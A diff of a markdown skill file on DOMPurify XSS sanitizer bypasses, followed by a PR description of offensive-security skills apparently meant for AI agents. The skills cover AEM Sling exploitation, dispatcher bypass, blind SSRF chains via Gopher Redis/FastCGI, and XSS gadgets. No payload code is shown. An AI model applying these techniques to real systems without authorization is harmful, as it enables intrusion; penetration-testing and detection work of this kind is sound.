+Same applies to `.val()` and `.textContent` reads that feed into innerHTML.
+
+**Detection:** Grep for `.text()` or `.val()` output flowing into `.innerHTML` or `.html()` — especially when DOMPurify sits upstream.
 
 ## Indicators
 - Payload executes despite DOMPurify presence in source code
 - Works only after DOM insertion (string looks safe, DOM isn't)
 - Deep nesting or namespace tags succeed when simple XSS payloads fail
+- Entity-encoded payloads execute when raw payloads are stripped (jQuery .text() chain)
 
 ## Chain With
 - unicode-normalization-bypass (Unicode payload variants through sanitizer)
+- dom-vulnerability-static-analysis (grep for .text()/.val() → innerHTML patterns)
 
 ## Reference
 https://mizu.re/post/exploring-the-dompurify-library-bypasses-and-fixes


### PR DESCRIPTION
New skill: aem-sling-exploitation (97% review, 96% content eval)
- Sling selector abuse (rawcontent, listParagraphs, form CVE-2024-26029)
- Dispatcher bypass chains via selector/suffix manipulation
- JCR enumeration and QueryBuilder exploitation
- AEM-specific XSS gadgets (moment.js, jQuery .text(), javascript: URI)
- Reference files: dispatcher-bypass-patterns.md, xss-gadgets.md

Updated: blind-ssrf-chains (97% review, 95% content eval)
- Added constraint assessment table — agents evaluate SSRF primitive capabilities before attempting chains, preventing wasted cycles
- Replaced repo-local callback CLI references with CallbackClient tool
- Consolidated duplicate examples, added Gopher Redis/FastCGI chain

Updated: dompurify-mxss-bypass (90% review, 100% content eval)
- Added jQuery .text() post-sanitization bypass (not mXSS, data flow bug)
- Added 8-step systematic workflow with validation checkpoints

Updated: dom-vulnerability-detection (92% review, 88% content eval)
- Added library gadgets: jQuery .text() re-decoding, moment.js format injection, javascript: URI hostname population bypass
- Added workflow feedback loops and expanded CSTI guidance

Updated: dom-vulnerability-static-analysis (92% review, 87% content eval)
- Extracted GADGETS.md reference file for progressive disclosure
- Added cross-validation step between grep and AST results
- moment.js detection: 38% → 100% with GADGETS.md content

All skills eval-validated via tessl (activation + content evals on claude-sonnet-4-6). Chain With sections cleaned for capability context.